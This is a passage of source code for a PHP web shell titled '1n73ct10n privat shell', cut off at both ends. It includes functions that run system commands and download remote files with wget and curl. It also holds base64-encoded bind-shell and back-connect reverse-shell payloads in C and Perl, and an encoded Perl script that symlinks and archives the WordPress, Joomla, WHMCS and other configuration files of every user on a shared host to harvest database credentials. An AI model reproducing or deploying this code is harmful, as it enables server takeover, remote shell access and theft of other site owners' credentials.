@fread($fp,1024); \r\n   \t\t} \r\n   \t\t@fclose($fp); \r\n\t   $fp2 = @fopen($file,"w"); \r\n\t   @fwrite($fp2,$cont); \r\n\t   @fclose($fp2); \r\n   }\r\n}\r\n\r\nfunction which($pr){\r\n\t$path = exe("which $pr");\r\n\tif(!empty($path)) { return trim($path); } else { return trim($pr); }\r\n}\r\n\r\nfunction download($cmd,$url){\r\n\t$namafile = basename($url);\r\n\tswitch($cmd) {\r\n\t\tcase \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break;\r\n\t\tcase \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wfread\' : ambil($wurl,$namafile);break;\r\n\t\tcase \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break;\r\n\t\tcase \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break;\r\n\t\tcase \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break;\r\n\t\tdefault: break;\r\n\t}\r\n\treturn $namafile;\r\n}\r\n\r\nfunction get_perms($file)\r\n{\r\n\tif($mode=@fileperms($file)){\r\n\t\t$perms=\'\';\r\n\t\t$perms .= ($mode & 00400) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00200) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00100) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00040) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00020) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00010) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00004) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00002) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00001) ? \'x\' : \'-\';\r\n\t\treturn $perms;\r\n\t}\r\n\telse return "??????????";\r\n}\r\n\r\nfunction clearspace($text){\r\n\treturn str_replace(" ","_",$text);\r\n}\r\n\r\n// net tools\r\n$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf\r\n+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE\r\nP/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ\r\ndKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL\r\n3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug\r\nUq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk\r\nHDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W\r\ntyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL\r\nZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6\r\nuPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";\r\n$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1\r\nNmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg\r\ntNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD\r\ne/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0\r\nLSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo\r\nvaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB\r\n+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";\r\n$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St\r\nktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j\r\nS2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ\r\nja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw\r\nTskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";\r\n$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA\r\nBYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95\r\nzzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75\r\ni+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A\r\nRkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY\r\njwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F\r\n6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";\r\n//confshell\r\n$configshell = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7\'; \r\n?>\r\n<html><head><link rel="SHORTCUT ICON" href="http://png-3.findicons.com/files/icons/1935/red_gems_vol_2/128/r2_dragon.png"><title>=[ 1n73ct10n privat shell ]=</title>\r\n<script type="text/javascript">\r\nfunction tukar(lama,baru){\r\n\tdocument.getElementById(lama).style.display = \'none\';\r\n\tdocument.getElementById(baru).style.display = \'block\';\r\n}\r\n</script>\r\n<style type="text/css">\r\nbody{\r\n\tbackground:#000000;;\r\n}\r\na {\r\ntext-decoration:none;\r\n}\r\na:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n*{\r\n\tfont-size:11px;\r\n\tfont-family:Tahoma,Verdana,Arial;\r\n\tcolor:#00ff00;\r\n}\r\n#menu{\r\n\tbackground:#111111;\r\n\tmargin:8px 2px 4px 2px;\r\n}\r\n#menu a{\r\n\tpadding:4px 18px;\r\n\tmargin:0;\r\n\tbackground:#222222;\r\n\ttext-decoration:none;\r\n\tletter-spacing:2px;\r\n\t-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;\r\n}\r\n#menu a:hover{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\n\tborder-top:1px solid #333333;\r\n}\r\n.tabnet{\r\n\tmargin:15px auto 0 auto;\r\n\tborder: 1px solid #333333;\r\n}\r\n.main {\r\n\twidth:100%;\r\n}\r\n.gaya {\r\n\tcolor: #00ff00;\r\n}\r\n.inputz{\r\n\tbackground:#111111;\r\n\tborder:0;\r\n\tpadding:2px;\r\n\tborder-bottom:1px solid #222222;\r\n\tborder-top:1px solid #222222;\r\n}\r\n.inputzbut{\r\n\tbackground:#111111;\r\n\tcolor:#00ff00;\r\n\tmargin:0 4px;\r\n\tborder:1px solid #444444;\r\n\r\n}\r\n.inputz:hover, .inputzbut:hover{\r\n\tborder-bottom:1px solid #00ff00;\r\n\tborder-top:1px solid #00ff00;\r\n}\r\n.output {\r\n\tmargin:auto;\r\n\tborder:1px solid #00ff00;\r\n\twidth:100%;\r\n\theight:400px;\r\n\tbackground:#000000;\r\n\tpadding:0 2px;\r\n}\r\n.cmdbox{\r\n\twidth:100%;\r\n}\r\n.head_info{\r\n\tpadding: 0 